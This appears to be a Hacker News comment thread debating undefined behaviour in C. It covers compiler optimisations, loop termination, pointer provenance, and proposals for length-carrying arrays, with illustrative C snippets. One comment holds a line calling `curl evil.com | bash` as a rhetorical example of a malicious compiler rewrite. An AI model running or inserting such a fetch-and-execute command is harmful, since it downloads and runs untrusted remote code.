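int store(int *array /* length 10 */, int i, int newval)
{
    if (i < 0 || i >= 10)
        return -EINVAL;
    printf("old value: %d\n", array[i]);  /* now provably in bounds */
    array[i] = newval;
    return 0;
}
```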


Per https://lwn.net/Articles/575563/, Debian at one point found that 40% of the C/C++ programs that they have are vulnerable to known categories of undefined behavior like this which can open up a variety of security holes.

This has been accepted as what to expect from C. All compiler authors think it is OK. People who are aware of the problem are overwhelmed at the size of it and there is no chance of fixing it any time soon.

The fact that this has come to be seen as normal and OK is an example of Normalization of Deviance. See http://lmcontheline.blogspot.com/2013/01/the-normalization-o... for a description of what I mean. And deviance will continue to be normalized right until someone writes an automated program that walks through projects, finds the surprising undefined behavior, and tries to come up with exploits. After project after project gets security holes, perhaps the C language committee will realize that this really ISN'T okay.

And the people who already migrated to Rust will be laughing their asses off in the corner.


Just to put in context how much they care, see when the Morris worm happened.


> in a lot of cases, it will be harmless; and in the worst case it will crash with a segfault.

I am not sure if a segfault is always the worst case. It could be by some coincidence that array[i] contains some confidential information [maybe part of a private key? 32 bits of the user's password?] and you've now written it to a log file.

I know it's hard to imagine a mis-read of ~32 bits would have bad consequences of that sort, but it's not out of the question.


Misreads of much less than that have been exploitable in the past.


Depends a lot on the specifics. For example heartbleed was a misread that led to the buffer being sent on the socket. And I think it was more than 32 bits. 32 bits of garbage into a log file that needs privileges to read sounds a tad less scary, but like I say, not out of the question to be harmful.


> Depends a lot on the specifics. For example heartbleed was a misread that led to the buffer being sent on the socket. And I think it was more than 32 bits. 32 bits of garbage into a log file that needs privileges to read sounds a tad less scary, but like I say, not out of the question to be harmful.

If you can do it a lot of times, though, that changes matters.


32 bits is plenty to effectively break ASLR or significantly weaken a cryptographic key.


I would be more concerned by the fact that if i is 10, then you already are in trouble ;)


This is a good example. Let me flesh it out a bit more to illustrate a specific instance of this problem:

  int a[2][2];
  int f (int i, int j)
   {
       int t = a[1][j];
       a[0][i] = 0;          // cannot change a[1]
       return a[1][j] - t;   // can be folded to zero
   }
The language says that elements of the matrix a must only be accessed by indices that are valid for each bound, so compilers can and some do optimize code based on that requirement (see https://godbolt.org/z/spSF8e).

But when a program breaks that requirement (say, by calling f(2, 0)) the function will likely return an unexpected value.


But I don't know what you want to happen in this case? If you actually call f(2,0) then the program makes no sense. How can you have an expected value for a function call that violates its preconditions?


Based on the memory layout of arrays, which AFAIK is defined rather strictly by the standard, a[0][2] will be the same as a[1][0].
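That layout claim can be checked without performing any out-of-bounds access, since forming (but not dereferencing) the one-past-the-end pointer of a row is legal, and comparing it for equality is well-defined:

```c
/* A 2x2 int array is one contiguous block, so the one-past-the-end
 * pointer of row 0 is the same address as the start of row 1. What the
 * standard leaves contentious is *accessing* a[0][2], not its address. */
int a[2][2];

int rows_are_contiguous(void)
{
    return (void *)&a[0][2] == (void *)&a[1][0];
}
```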


> ["]I can use that information!"

Yes, that is a perfect example of buggy compiler handling of undefined behaviour. A non-buggy compiler would either behave in a manner characteristic of the environment (ie read address array+i), ignore the situation entirely (which also results in reading array+i), or (preferably) issue an error to the effect of "possible array access out of bounds, suggest 'assert(i<10);' here".


Very well put (deliberately using the exact terminology used in the standard)!

Can we just make that binding again? After all, it used to be.

It should be obvious to compiler writers what the intention of the standard is, because it says so in the dang text, but since this was downgraded to a note and you are technically not in violation if you do something different, everyone now acts as if doing the exact opposite of what is written there is somehow OK.

The downgrade to note-status seemed to be predicated on the idea that implementors can be trusted to do The Right Thing™ in these cases. It is now evidently clear that they cannot, so we have to force them.


> It should be obvious to compiler writers what the intention of the standard is, because it says so in the dang text, but since this was downgraded to a note and you are technically not in violation if you do something different, everyone now acts as if doing the exact opposite of what is written there is somehow OK.

Note that a compiler could be incapable of processing any useful programs whatsoever, and yet still be a "conforming C implementation" if it is capable of processing a deliberately contrived and useless program that exercises the Standard's translation limits. The authors of the Standard even acknowledge that possibility in the Rationale.

The problem is that the authors of the Standard recognized that anyone seeking to sell compilers would treat Undefined Behavior as an invitation to behave in whatever fashion would best meet their customers' needs, but failed to consider that a moderately-decent freely distributable compiler could become popular as a result of being freely distributable without its maintainers having to respect its users.


Yep, that is exactly my analysis of the situation: an actual compiler vendor would never (could never) pull any of these stunts, or they'd simply go out of business in a jiffy. Alas, we all got suckered into "free", and now the compiler writers no longer listen to their users, because they are not their customers.

Their customers are their PhD advisers and Google, Apple and maybe a few more "whales", as Stonebraker described them, lamenting a similar situation in databases. Their needs are almost completely different from the rest of us!

For Google, a 0.1% performance improvement in one of their key applications is worth quite a bit of extra pain for their own developers, and pretty much an infinite amount of pain for other developers.

https://www.youtube.com/watch?v=DJFKl_5JTnA


BTW, what do you think of the suggested text I offered near the top of this thread, that UB represents a waiver of the Standard's jurisdiction for the purpose of allowing implementations to best serve their intended purposes? It's too late to go back in time and add that to C89 or C99, but a lot of insanity could have been avoided had such text been present.

Further, instead of characterizing as UB all situations where a useful optimization might affect the behavior of a program, it would be far safer and more useful to allow particular optimizations in cases where their effects might be observable, but where all allowable resulting behaviors would meet application requirements.

As a simple example, instead of saying "a compiler may assume that all loops with non-constant conditions will terminate", I would say that if the exit of a loop is reachable, and no individual action within the loop would be observably sequenced with regard to some particular succeeding operation, a compiler may at its leisure reorder the succeeding operation ahead of the loop. Additionally, if code gets stuck in a loop with no side effects that will never terminate, an implementation may provide an option to raise a signal to indicate that.

If a function is supposed to return a value meeting some criterion, and it would find such a value in all cases where a program could execute usefully, but the program would do something much worse than useless if the function were to return a value not meeting the criteria, a program execution where the function loops forever may be useless, and may be inferior to one that gets abnormally terminated by the aforementioned signal, but may be infinitely preferable to one where the function, as a result of "optimization", returns a bogus value. Allowing a programmer to safely write a loop which might end up not terminating would make it possible to yield more efficient machine code than would be needed if the only way to prevent the function from returning a bogus value would be to include optimizer-proof code to guard against the endless-loop case.


> that UB represents a waiver of the Standard's jurisdiction for the purpose of allowing implementations to best serve their intended purposes?

This won't work because defective implementations will just claim that their intended purpose is to do [whatever emergent behaviour that implementation produces], or to generate the fastest code possible regardless of whether that code bears any relation to what the programmer asked for.

> As a simple example, instead of saying "a compiler may assume that all loops with non-constant conditions will terminate"

This is actually completely unneeded, even for optimisation. If a side effect can be hoisted out of a loop at all, it can be hoisted regardless of whether the loop terminates. If the code (called from) inside the loop can (legally) observe the side effect, then it can't be hoisted even if the loop does always terminate. If code outside the loop observes the side effect, then either the loop terminates (and whatever lets you hoist terminating-loop side effects applies) or the code outside the loop is never executed (and thus can't observe any side effects, correct or incorrect).


> This won't work because defective implementations will just claim that their intended purpose is to do [whatever emergent behaviour that implementation produces], or to generate the fastest code possible regardless of whether that code bears any relation to what the programmer asked for.

I would have no qualm with the way clang and gcc process various constructs if they were to explicitly state that its maintainers make no effort to make their optimizer suitable for any tasks involving the receipt of untrustworthy input. Instead, however, they claim that their optimizers are suitable for general-purpose use, despite the fact that their behavior isn't reliably suitable for many common purposes.

> This is actually completely unneeded, even for optimisation.

Consider the following function:

    unsigned long long test(unsigned long long x, int mode)
    {
      do
        x = slow_function_no_side_effects();
      while(x > 1);
      if (mode)
        return 1;
      else
        return x;
    }
Suppose the function is passed a value of "x" which would get caught in a cycle that never hits zero or one, but "mode" is 1. If the code is processed by performing every individual step in order, the function would never return. The rule in C11 is designed to avoid requiring that generated code compute the value of x when its only possible effect on the program's execution would be to prevent the execution of code that doesn't depend on its value.

Suppose the most important requirement that function test() must meet is that it must never return 1 unless mode is 1, or the iteration on x would yield 1 before it yields zero; returning 1 in any other cases would cause the computer's speaker to start playing Barney's "I love you" song, and while looping endlessly would be irksome, it would be less bad than Barney's singing. If a compiler determines that slow_function_no_side_effects() will never return an even number, should it be entitled to generate code that will return 1 when mode is zero, without regard for whether the loop actually completes?

I would think it reasonable for a compiler to defer/skip the computation of x in cases where mode is 1, or for a compiler that can tell that "x" will never be an even number to generate code that, after ensuring that the loop will actually terminate, would unconditionally return 1. Requiring that the programmer write extra code to ensure that the function not return 1 in cases where mode is zero but the loop doesn't terminate would defeat the purpose of "optimization".


Do you mean `x = slow_function_no_side_effects( x );`? Because if slow_function_no_side_effects really doesn't have side effects, then your version is equivalent to:

  x = slow_function_no_side_effects(); /* only once */
  if(x > 1) for(;;) { /* infinite loop */ }
  return mode ? 1 : x;
That said, I suppose it might be reasonable to explicitly note that an optimiser is allowed to make a program or subroutine complete in less time than it otherwise would, even if that reduces the execution time from infinite to finite. That doesn't imply inferring any new facts about the program - either loop termination or otherwise - though. On the other hand it might be better not to allow that; you could make a case that the optimisation you describe is an algorithmic change, and if the programmer wants better performance, they need to write:

  unsigned long long test(unsigned long long x, int mode)
    {
    if(mode) return 1; /* early exit */
    do x = slow_function_no_side_effects(x);
    while(x > 1);
    return x;
    }
, just the same as if they wanted their sorting algorithm to complete in linear time on already-sorted inputs.


Yeah, I meant `slow_function_no_side_effects(x)`. My point is that there's a huge difference between saying that a compiler need not treat a loop as sequenced with regard to outside code if none of the operations therein are likewise sequenced, versus saying that if a loop without side effects fails to terminate, compiler writers should regard all imaginable actions the program could perform as equally acceptable.

In a broader sense, I think the problem is that the authors of the Standard have latched onto the idea that optimizations must not be observable unless a program invokes Undefined Behavior, and consequently any action that would make the effects of an optimization visible must be characterized as UB.

I think it would be far more useful to recognize that optimizations may, on an opt-in or opt-out basis, be allowed to do various things whose effects would be observable, and correct programs that would allow such optimizations must work correctly for any possible combination of effects. Consider the function:

    struct blob { uint16_t a[100]; } x,y,z;

    void test1(int *dat, int n)
    {
      struct blob temp;
      for (int i=0; i<n; i++)
        temp.a[i] = i;
      x=temp;
      y=temp;

    }
    void test2(void)
    {
      int indices[] = {1,0};
      test1(indices, 2);
      z=x;
    }
Should the behavior of test2() be defined despite the fact that `temp` is not fully written before it is copied to `x` and `y`? What if anything should be guaranteed about the values of `x.a[2..99]`, `y.a[2..99]`, and `z.a[2..99]`?

While I would allow programmer to include directives mandating more precise behavior or allowing less precise behavior, I think the most useful set of behavioral guarantees would allow those elements of `x` and `y` to hold arbitrarily different values, but that `x` and `z` would match. My rationale would be that a programmer who sees `x` and `y` assigned from `temp` would be able to see where `temp` was created, and would be able to see that some parts of it might not have been written. If the programmer cared about ensuring that the parts of `x` and `y` corresponding to the unwritten parts matched, there would be many ways of doing that. If the programmer fails to do any of those things, it's likely because the programmer doesn't care about those values.

The programmer of function `test2()`, however, would generally have no way of knowing whether any part of `x` might hold something that won't behave as some possibly-meaningless number. Further, there's no practical way that the author of `test2` could ensure anything about the parts of `x` corresponding to parts of `temp` that don't get written. Thus, a compiler should not make any assumptions about whether a programmer cares about whether `z.a[2..99]` match `x.a[2..99]`.

A compiler's decision to optimize out assignments to `x[2..99]` and `y[2..99]` may be observable, but if code would not, in fact, care about whether `x[2..99]` and `y[2..99]` match, the fact that the optimization may cause the arrays to hold different Unspecified values should not affect any other aspect of program execution.


> there's a huge difference between saying that a compiler need not treat a loop as sequenced with regard to outside code if none of the operations therein are likewise sequenced, versus saying that if a loop without side effects fails to terminate, compiler writers should regard all imaginable actions the program could perform as equally acceptable.

Yes, definitely true. It's debatable whether it's okay for a compiler to rewrite code as in the second example at https://news.ycombinator.com/item?id=22903396 , but it is not debatable that rewriting it with anything equivalent to:

  if(x > 1 && x == slow_function_no_side_effects(x))
    { system("curl evil.com | bash"); }
is a compiler bug, undefined behaviour be damned.

> that the authors of the Standard have latched onto the idea that optimizations must not be observable unless a program invokes Undefined Behavior

I don't know if this quite characterizes the actual reasoning, but it does seem like a good summary of the overall situation, with "we might do x0 or x1, so x is undefined behaviour" ==> "x is undefined, so we'll do x79, even though we know that's horrible and obviously wrong".

> I think the most useful set of behavioral guarantees would allow those elements of `x` and `y` to hold arbitrarily different values, but that `x` and `z` would match.

Actually, I'm not sure that makes sense; your code is equivalent to:

  struct blob { uint16_t a[100]; } x,y,z;
  
  void test2(void)
    {
    int indices[] = {1,0};
    ; {
      int* dat = indices;
      int n = 2;
      ; {
        struct blob temp;
        for(int i=0; i<n; i++) temp.a[i] = i;
        /* should that be dat[i] ? */
        x=temp;
        y=temp;
        }
      }
    z=x;
    }
I don't think it makes sense to treat x=temp differently from z=x. Maybe if you treat local variables (temp) differently from global variables (x,y,z) but that seems brittle. (What happens if x,y,z are moved inside test2? What if temp is moved out? Does accessing some or all of them through pointers change things?)


The indent is getting rather crazy on this thread; I'll reply further up-thread so as to make the indent less crazy.


Replying to the code [discussed deeper in this sub-thread]:

    struct blob { uint16_t a[100]; } x,y,z;
  
    void test2(void)
    {
      int indices[] = {1,0};
      {
        int* dat = indices;
        int n = 2;
        {
          struct blob temp;
          for(int i=0; i<n; i++) 
            temp.a[dat[i]] = i; // This is what I'd meant
          x=temp;
          y=temp;
        }
        z=x;
      }
    }
The rewrite sequence I would envision would be:

    struct blob { uint16_t a[100]; } x,y,z;
  
    void test2(void)
    {
      int indices[] = {1,0};
      {
        int* dat = indices;
        int n = 2;
        {
          struct blob temp1 = x; // Allowed initial value
          struct blob temp2 = y; // Allowed initial value
          for(int i=0; i<n; i++)
          {
            temp1.a[dat[i]] = i;
            temp2.a[dat[i]] = i;
          }
          x=temp1;
          y=temp2;
        }
        z=x;
      }
    }
Compilers may replace an automatic object whose address is not observable with two objects, provided that anything that is written to one will be written to the other before the latter is examined (if it ever is). Such a possibility is the reason why automatic objects which are written between "setjmp" and "longjmp" must be declared "volatile".

If one allows a compiler to split "temp" into two objects without having to pre-initialize the parts that hold Indeterminate Value, that may allow more efficient code generation than would be possible if either "temp" was regarded as holding Unspecified Value, or if copying a partially-initialized object was classified as "modern-style Undefined Behavior", making it necessary for programmers to manually initialize entire structures, including parts whose values would otherwise not observably affect program execution.

The optimization benefits of attaching loose semantics to objects of automatic duration whose address is not observable are generally greater than the marginal benefits of attaching those semantics to all objects. The risks, however, are relatively small since everything that could affect the objects would be confined to a single function (if an object's address is passed into another function, its address would be observable during the execution of that function).

BTW, automatic objects whose address isn't taken have behaved somewhat more loosely than static objects even in compilers that didn't optimize aggressively. Consider, for example:

    volatile unsigned char x,y;
    int test(int dummy, int mode)
    {
      register unsigned char result;
      if (mode & 1) result = x;
      if (mode & 2) result = y;
      return result;
    }
On many machines, if an attempt to read an uninitialized automatic object whose address isn't taken is allowed to behave weirdly, the most efficient possible code for this function would allocate an "int"-sized register for "result", even though it's only an 8-bit type, do a sign-extending load from `x` and/or `y` if needed, and return whatever happens to be in that register. That would not be a complicated optimization; in fact, it's a simple enough optimization that even a single-shot compiler might be able to do it. It would, however, have the weird effect of allowing the uninitialized "result" object of type "unsigned char" to hold a value outside the range 0..255.

Should a compiler be required to initialize "result" in that situation, or should programmers be required to allow for the possibility that if they don't initialize an automatic object it might behave somewhat strangely?


  >   temp.a[dat[i]] = i; // This is what I'd meant
I see.

  >   struct blob temp1 = x; // Allowed initial value
With, I presume, an eye toward further producing:

  x.a[dat[i]] = i;
  y.a[dat[i]] = i;
?

> Compilers may replace an automatic object whose address is not observable with two objects,

That makes sense.

> do a sign-extending load from `x` and/or `y`

I assume you mean zero-extending; otherwise `x=255` would result in `result=-1`, which is clearly wrong.

> Should a compiler be required to initialize "result" in that situation, or should programmers be required to allow for the possibility that if they don't initialize an automatic object it might behave somewhat strangely?

Of course not. Result (assuming mode&3 == 0) is undefined, and behaviour characteristic of the environment is that result (aka eg eax) can hold any (say) 32-bit value (whether that's 0..FFFF'FFFF or -8000'0000..7FFF'FFFF depends on what operations are applied, but `int` suggests the latter).

None of this involves the compiler inferring objective (and frequently false) properties of the input program (such as "this loop will terminate" or "p != NULL"), though.


> With, I presume, a eye toward further producing: x.a[dat[i]] = i; y.a[dat[i]] = i;

Bingo.

> I assume you mean zero-extending; otherwise `x=255` would result in `result=-1`, which is clearly wrong.

Naturally.

> None of this involves the compiler inferring objective (and frequently false) properties of the input program (such as "this loop will terminate" or "p != NULL"), though.

Thus the need to use an abstraction model which allows optimizations to alter observable aspects of a program whose behavior is, generally, defined. I wouldn't describe such things as "behavior characteristic of the environment", though the environment would affect the ways in which the effects of optimizations might be likely to manifest themselves.

Note that programs intended for different tasks on different platforms will benefit from slightly--but critically--different abstraction models, and there needs to be a way for programs to specify when deviations from the "load/store machine model" which would normally be acceptable, aren't. For example, there should be a way of indicating that a program requires that automatic objects always behave as though initialized with Unspecified rather than Indeterminate Value.

A good general-purpose abstraction model, however, should allow a compiler to make certain assumptions about the behaviors of constructs, or substitute alternative constructs whose behaviors would be allowed to differ, but would not allow a compiler to make assumptions about the behaviors of constructs it has changed to violate them.

Consider, for example:

    typedef void proc(int);  // Ever seen this shorthand for prototypes?
    proc do_something1, do_something2, do_something3;

    void test2(int z)
    {
      if (z < 60000) do_something3(z);
    }

    int q;
    void test1(int x)
    {
      q = x*60000/60000;
      if (q < 60000) do_something1(q);
      int y = x*60000/60000;
      if (y < 60000) do_something2(y);
      test2(y);
    }
Under a good general-purpose model, a compiler could generate code that could never set q to a value greater than INT_MAX/60000, and a 32-bit compiler that did so could assume that q's value would always be in range and thus omit the comparison. A compiler could also generate code that would simply set q to x, but would forfeit the right to assume that it couldn't be greater than INT_MAX/60000.

There could be optimization value in allowing a compiler to treat automatic objects "symbolically", allowing the second assignment/test combination to become:

      if (x*60000/60000 < 60000) 
        do_something2(x*60000/60000);
even though the effect of the substituted expression might not be consistent. I wouldn't favor allowing inconsistent substitutions by default, but would favor having a means of waiving normal behavioral guarantees against them for local automatic objects whose address is not taken. On the other hand, there would need to be an operator which, when given an operand with a non-deterministic value, would choose in Unspecified fashion from among the possibilities; to minimize security risks that could be posed by such values, I would say that function arguments should by default behave as though passed through that operator.

The guiding principle I would use in deciding that the value substitution would be reasonable when applied to y but not q or z would be that a programmer would be able to see how y's value is assigned, and see that it could produce something whose behavior would be "unusual", but a programmer looking at test2() would have no reason to believe such a thing about z.


> I wouldn't describe such things as "behavior characteristic of the environment",

`result` being a 32-bit integer (register) of dubious signedness is behaviour characteristic of the environment, which the implementation is sometimes obliged to paper over (eg with `and eax FF`) in the interests of being able to write correct code.

> A good general-purpose abstraction model, however, should allow a compiler to make certain assumptions about the behaviors of constructs, or substitute alternative constructs whose behaviors would be allowed to differ, but would not allow a compiler to make assumptions about the behaviors of constructs it has changed to violate them.

> Under a good general-purpose model, a compiler could generate code that could never set q to a value greater than INT_MAX/60000, and a 32-bit compiler that did so could assume that q's value would always be in range and thus omit the comparison. A compiler could also generate code that would simply set q to x, but would forfeit the right to assume that it couldn't be greater than INT_MAX/60000.

Yes, clearly.

> I wouldn't favor allowing inconsistent substitutions by default, but would favor having a means of waiving normal behavioral guarantees

In that case, I'm not sure what we're even arguing about; the language standard might or might not standardize a way of specifying said waiver, but as long as it's not lumped in with -On or -std=blah that are necessary to get a proper compiler, it has no bearing on real-world programmers that're just trying to get working code. Hell, I'd welcome a -Ounsafe or whatever, just to see what sort of horrible mess it makes, as long as -Ono-unsafe exists and is the default.


> Yes, clearly.

Unfortunately, the C Standard doesn't specify an abstraction model that is amenable to the optimization of usable programs.

> In that case, I'm not sure what we're even arguing about; the language standard might or might not standardize a way of specifying said waiver, but as long as it's not lumped in with -On or -std=blah that are necessary to get a proper compiler, it has no bearing on real-world programmers that're just trying to get working code. Hell, I'd welcome a -Ounsafe or whatever, just to see what sort of horrible mess it makes, as long as -Ono-unsafe exists and is the default.

The only reason for contention between compiler writers and programmers is a desire to allow compilers to optimize based upon the assumption that a program won't do certain things. The solution to that contention would be to have a means of inviting optimizations in cases where they would be safe and useful, analogous to what `restrict` would be if the definition of "based upon" wasn't so heinously broken.


> to allow compilers to optimize based upon the assumption that a program won't do certain things.

Emphasis mine. This is always wrong. Correct (and thus legitimate-to-optimize-based-on) knowledge of program behavior is derived by actually looking at what the program actually does, eg "p can never be NULL because if it was, a previous jz/bz/cmovz pc would have taken us somewhere else"[0]. Optimising "based on" undefined behaviour is only legitimate to the extent that it consists of choosing the most convenient option from the space of concrete realizations of particular undefined behaviour that are consistent with the environment (especially the hardware).

0: Note that I don't say "a previous if-else statement", because when we say "p can never be NULL", we're already in the process of looking for reasons to remove if-else statements.


There are many cases where accommodating weird corner cases would be expensive, and would only be useful for some kinds of program. Requiring that all implementations intended for all kinds of task handle corner cases that won't be relevant for most kinds of tasks would needlessly degrade efficiency. The problem is that there's no way for programs to specify which corner cases they do or don't need.


> Requiring that all implementations intended for all kinds of task handle corner cases that won't be relevant for most kinds of tasks would needlessly degrade efficiency.

Yes, that's what undefined behaviour is for. Eg requiring that implementations handle integer overflow needlessly degrades efficiency of the overwhelming majority of tasks where integers do not in fact overflow.

> The problem is that there's no way for programs to specify which corner cases they do or don't need.

Wait, are you just asking (the situationally appropriate equivalent of) `(int32_t)((uint32_t)x+(uint32_t)y)` and/or `#pragma unsafe assert(p!=NULL)`? Because while it's a shame the standard doesn't provide standardized ways to specify these things (as I admitted upthread) programs are perfectly capable of using the former, and implementations are perfectly capable of supporting the latter; I'm just arguing that the defaults should be sensible.


In many cases, the semantics programmers would require are much looser than anything provided for by the Standard. For example, if a programmer requires an expression that computes (x * y / z) when there is no overflow, and computes an arbitrary value with no side effects when there is an overflow, a programmer could write the expression with unsigned and signed casting operators, but that would force a compiler to generate machine code to actually perform the multiplication and division even in cases where it knows that y will always be twice z. Under "yield any value with no side effects" semantics, a compiler could replace the expression with (x * 2), which would be much faster to compute.


This is a common misconception (or poor way of phrasing it, sorry). Compiler implementers don't go looking for instances of undefined behavior in a program with the goal of optimizing it in some way. There is little value in optimizing invalid code. The opposite is the case.

But we must write code that relies on the same rules and requirements that programs are held to (and vice versa). When either party breaks those rules, either accidentally or deliberately, bad things happen.

What sometimes happens is that code written years or decades ago that relies on the absence of an explicit guarantee in the language suddenly stops working, because a compiler change depends on the assumption that code doesn't rely on the absence of the guarantee. That can happen as a result of improving optimizations, which is often but not necessarily always motivated by improving the efficiency of programs. Better analysis can also help find bugs in code or avoid issuing warnings for safe code.


The fact that the Standard does not impose requirements upon how a piece of code behaves implies that the code is not strictly conforming, but the notion that it is "invalid" runs directly contrary to the intentions of the C89 and C99 Standards Committees, as documented in the published C99 Rationale. That document recognizes Undefined Behavior as, among other things, "identifying avenues of conforming language extension". Code that relies upon such extensions may be non-portable, but the authors of the Standard have expressly said that they did not wish to demean useful programs that happen to be non-portable.


There are rules and requirements documented in the spec, and there are de-facto rules and requirements that programs expect. Not only that, but when they do exploit these rules, often the code generated is obviously incorrect, and could have been flagged at compile time.

Right now, it seems like compiler vendors are playing a game of chicken with their users.


I think the issue is that many of these "obviously incorrect" things are not obvious at the level that the optimizations are taking place. Perhaps it would be worth considering adding higher-level passes in the compiler that can detect these kinds of surprising changes and warn about them.


Well, no, the issue is that the compiler writers refuse to acknowledge that these obviously incorrect things are incorrect in the first place and tend to blame users for tripping over compiler bugs. If it were just that they didn't know how to fix said bugs, that would be a qualitatively different and much less severe problem.


> not obvious at the level that the optimizations are taking place

Hmm...then it's up to the optimisers to up their game.

Optimisation is supposed to be behaviour-preserving. Arguing that almost all real-world programs invoke UB and therefore don't have well-defined behaviour (by the standard as currently interpreted) is a bit of a cop-out.


> This is a common misconception (or poor way of phrasing it, sorry). Compiler implementers don't go looking for instances of undefined behavior in a program with the goal of optimizing it in some way. There is little value in optimizing invalid code. The opposite is the case.

Compilers do deliberately look to optimize loops with signed counters by exploiting UB to assume that they will never wrap.


I'd say both statements are correct.

Compiler implementers are happy when they don't have to care about some edge case because then the code is simpler. Thus, only for unsigned counters is there extra logic to compile them correctly.

That is my interpretation of "The opposite is the case". Writing a compiler is easier with lots of undefined behavior.


But that's backwards, the compiler writers are writing special cases to erase checks in the signed case. Doing the 'dumb' thing and mindlessly going through the written check is simpler which is why that's what compilers did for decades as de facto standard on x86.


The dumb thing is a non-optimizing compiler. GCC and LLVM contain many optimization phases. It is probably some normal optimization which is only "wrong" in the context of loop conditions.


Well yes, they assume they never wrap because that is not allowed by the language, by definition. UB are the results of broken preconditions at the language level.


Terminology can go either way, but is it such a good idea what gcc actually does?


I would say that there is a lot of concern in the committee about how compilers are optimizing based on pointer providence. There has been a study group looking at this. It now appears that they are likely to publish their proposal as a Technical Report.


"based on pointer providence"

I think you meant "provenance" (mentioning it for the sake of anyone who wants to search for it).


Yes, my mistake--I was thinking of Rhode Island. I wrote a short bit about this at https://www.nccgroup.trust/us/about-us/newsroom-and-events/b... if anyone is interested.


What makes pointer provenance really great is that clang and gcc will treat pointers that are observed to have the same address as freely interchangeable, even if their provenance is different. Clang sometimes even goes so far with that concept that even uintptr_t comparisons won't help.

    #include <stdint.h>

    extern int x[],y[];
    int test(int i)
    {
        y[0] = 1;
        if ((uintptr_t)(x+5) == (uintptr_t)(y+i))
            y[i] = 2;
        return y[0];
    }
If this function is invoked with i==0, it should be possible for y[0] and the return value to both be 1, or both be 2. If x has five elements, however, and y immediately follows it, clang's generated code will set y[0] to 2 and yet return 1. Cool, eh?


What's the best way to keep an eye out for that TR? Periodically checking http://www.open-std.org/jtc1/sc22/wg14/ ?

I can't ever tell if I'm looking in the right place. :)


If you're interested in the final TR, I would imagine we'd list it on that page you linked. If you're interested in following the drafts before it becomes published, you'd find them on http://www.open-std.org/jtc1/sc22/wg14/www/wg14_document_log... (A draft has yet to be posted, though, so you won't find one there yet.)


Why would a vendor be unhappy about that? They have a large library using this deprecated syntax? Or many customers? It seems like a relatively easy fix to existing code.


The usual argument is: once you've verified some piece of code is correct, changing it (even when there should be no functional change in the semantics) carries risk. Some customers have C89-era code that compiles in C17 mode and they don't want to change that code because of these risks (perhaps the cost of testing is prohibitively expensive, there may be contractual obligations that kick in when changing that code, etc).


Well, one argument is that the vendors should not compile C89 code as C17. If you write C89, then stick with -std=c89 (or upgrade to the latest officially compatible revision).

It makes sense to preserve language compatibility within several language revisions, gradually sunsetting some features, but why do that for the eternity? Gradual de-supporting would push the problem to the compilers, but while it is no fun supporting, let's say, C89 and a hypothetical incompatible language C3X, this is where the effort should go (after all, companies with the old codebases can stick with older compilers). There is a great value in paving a way for a more fundamental C language simplifications and clean ups.


These are all good points, and I don't see a legitimate, technical reason to avoid deprecating and eliminating identifier list syntax in new C standards (but then, I'm not as much of an expert as some people, so I might be missing something important).

That having been said, a compiler vendor has, almost by definition as its first priority, an undeniable interest in keeping customers happy while, at the same time, ensuring strong reasons to see value in a version upgrade. When dealing with corporate enterprise customers, that often means offering new features without deprecating old features, because the customers want the new features but don't want to have to rewrite anything just because of a compiler upgrade.

They'll want C17 (and C32, for that matter) hot new features, but they will not want to pay a developer to "rewrite code that already works" (in the view of middle managers).

That's why I think they'd most likely complain. Their concerns about removing identifier lists likely have nothing at all to do with good technical sense. Ideally, if you don't want to rewrite your rickety old bit-rotting shit code, you should just continue compiling it with an old compiler, and if you want new language features you should use them in new language standard code, period, but business (for pathological, perhaps, but not really upstream-curable reasons) doesn't generally work that way.


One alternative at that point is to just ignore the fact that the deprecated feature is now removed and continue supporting it in your compiler. Maybe you hide standards compliance behind a flag. Annoying and more overhead, but saves your clients from spending dollars on upgrading their obsolete code.


Yep. That happens a lot, in practice.


Looks like that proposal is dropping support for K&R function declarations, is that right?


yes, that is correct.


> Proper array support (which passes around the length along with the data pointer).

I second this one. One of the best things from Rust is its "fat pointers", which combine a (pointer, length) or a (pointer, vtable) pair as a single unit. When you pass an array or string slice to a function, under the covers the Rust compiler passes a pair of arguments, but to the programmer they act as if they were a single thing (so there's no risk of mixing up lengths from different slices).


The C family has already evolved in this direction decades ago. Have you heard of C++ (Cee Plus Plus)?

It is production-ready; if you want a dialect of C with arrays that know their length, you can use C++. If you wanted a dialect of C in 1993 with arrays that know their length for use in a production app you could also have used C++ then.

The problem with all these "can we add X to C" is that there is always an implicit "... but please let us not add Y, Z and W, because that would start to turn C into C++, which we all agree that we definitely don't want or need."

The kicker is that everyone wants a different X.

Elsewhere in this thread, I noticed someone is asking for namespace { } and so it goes.

C++ is the result --- is that version of the C language --- where most of the crazy "can you add this to C" proposals have converged and materialized. "Yes" was said to a lot of proposals over the years. C++ users had to accept features they don't like that other people wanted, and had to learn them so they could understand C++ programs in the wild, not just their own programs.


C++ introduces a shit-ton of stuff that one often doesn't want, and even Bjarne Stroustrup (who many content has never seen a language feature he didn't want) has been a little alarmed at the sheer mass of cruft being crammed into recent updates to the standard. I know many C++ people think C++ is pure improvement over C in all contexts and manners, but it's not. It's different, and there are features implemented in C++ and not in C that could be added to C without damaging C's particular areas of greatest value, and many other features in C++ that would be pretty bad for some of C's most important use cases.

C shouldn't turn into C++, or even C++ Lite™, but it shouldn't remain strictly unchanging for all eternity, either. It should just always strive to be a better C, conservatively, because its niche is one where conservative advancement is important.

Some way to adopt programming practices that guarantee consistent management of array and pointer length -- not just write code to check it, but actually guarantee it -- would, I think, perfectly fit the needs of conservative advancement suitable to C's most important niche(s). It may not take the form of a Rust-like "fat pointer". It may just be the ability to tell the compiler to enforce a particular constraint for relationships between specific struct fields/members (as someone else in this discussion suggested), in a backward-compatible manner such that the exact same code would compile in an older-standard compiler -- a very conservative approach that should, in fact, solve the problem as well as "fat pointers".

There are ways to get the actually important upgrades without recreating C++.


> C++ introduces a shit-ton of stuff that one often doesn't want

The point in my comment is that every single item in C++ was wanted and championed by someone, exactly like all the talk about adding this and that to C.

> C shouldn't turn into C++

Well, C did turn into C++. The entity that gave forth C++ is C.

Analogy: when we say "apes turned into humans", we don't mean that apes don't exist any more or are not continuing to evolve.

Since C++ is here, there is no need for C to turn into another C++ again.

A good way to have a C++ with fewer features would be to trim from C++ rather than add to C.


Sure, but there's a vast space between the C and C++ approaches. You don't have to say yes to everything to say yes to a few things. I would suggest that better arrays are an example of something that pretty much everybody wants.


But if you want better arrays you want operator overload to be able to use these arrays as 1st class citizens without having to use array_get(arr, 3), array_len(arr), array_concatenate(arr1, arr2) etc... You want to be able to write "arr[3]", "arr.len()", "arr1 += arr2" etc... To implement operator overload you might need to add the concept of references.

